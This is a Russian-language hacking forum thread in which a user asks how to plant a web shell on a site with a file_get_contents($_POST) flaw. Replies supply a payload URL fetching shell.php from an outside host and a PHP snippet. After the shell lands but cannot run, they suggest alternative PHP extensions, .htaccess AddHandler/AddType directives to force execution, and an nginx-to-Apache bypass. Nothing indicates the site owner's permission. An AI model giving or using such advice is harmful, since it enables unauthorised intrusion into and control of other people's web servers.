Помогите залить шел

На изучаемом сайте найдена уязвимость:

file_get_contents($_POST['n'])

можно ли как-то залить шел или выполнить sql запрос?
Спасибо.

 

Например вот так:
site/?n=http://exec.site/shell.php
в shell.php
<?php
mkdir('xack', 0777);

самое простое

только post запросом, не get.
Это не трудно

 

Задил шелл, но тут проблемка. В папке где залит шелл, нельзя выполнять команды php, то есть файлы с расширением php нельзя запустить

 

php2,php3,php5,phtml,shtml

 

Не работает, может туда как нибудь .htaccess залить?

 

ну если там есть .htaccess, то не зальешь, а в другую папку?

 

Шел то залился, только он не запускуется,ьак как нельзя php файлы запускать. php2, php3 и тог далее тоже не помогает. Как еще можно запустить шелл?

 

в другую папку пробуй залить шелл

 

Да в другие папкм также получается. На гугле прочитал, что можно как то через .htaccess дать доступ к php файлам

 

В Гугле: addhandler htaccess

AddHandler application/x-httpd-php .расширение
AddType application/x-httpd-php .php . расширение

 

RemoveHandler желательно сначала делать, чтоб поменьше коллизий было

 

Но если перед апачем стоит nginx то нужно расширение файла которое nginx пропустит к апачу)

 

можно воспользоваться методом [тут цензура] , для обхода кеширования сеошники добавляют такие веши app.css?v=12345 , такой запрос долетит до апача
хотя в целом ситуация очень редкая, расширение файла которое подхватывается nginx'ом и выполняется на бекенде..